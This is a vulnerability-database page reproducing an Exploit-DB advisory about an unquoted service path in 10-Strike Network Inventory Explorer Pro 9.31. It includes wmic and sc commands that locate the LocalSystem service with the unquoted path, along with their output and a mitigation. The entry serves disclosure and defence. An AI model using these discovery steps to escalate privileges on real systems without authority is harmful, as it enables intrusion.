header-logo
Suggest Exploit
vendor:
Network Inventory Explorer Pro
by:
Brian Rodriguez
7.8
CVSS
HIGH
Unquoted Service Path
426
CWE
Product Name: Network Inventory Explorer Pro
Affected Version From: 9.31
Affected Version To: 9.31
Patch Exists: NO
Related CWE:
CPE: 10-strike:network_inventory_explorer_pro
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Enterprise 64 bits
2021

10-Strike Network Inventory Explorer Pro 9.31 – ‘srvInventoryWebServer’ Unquoted Service Path

A vulnerability in 10-Strike Network Inventory Explorer Pro 9.31 allows an attacker to gain elevated privileges due to an unquoted service path. An attacker can use the Windows Management Instrumentation Command-line (WMIC) to query the service and find the unquoted service path. The service can then be exploited to gain elevated privileges.

Mitigation:

Ensure that all services have a fully qualified path with quotes around the path. Additionally, ensure that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage:  https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

srvInventoryWebServer    srvInventoryWebServer   C:\Program Files
(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network
Inventory Explorer Pro\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Navigation

Suggest Exploit

Services By CQR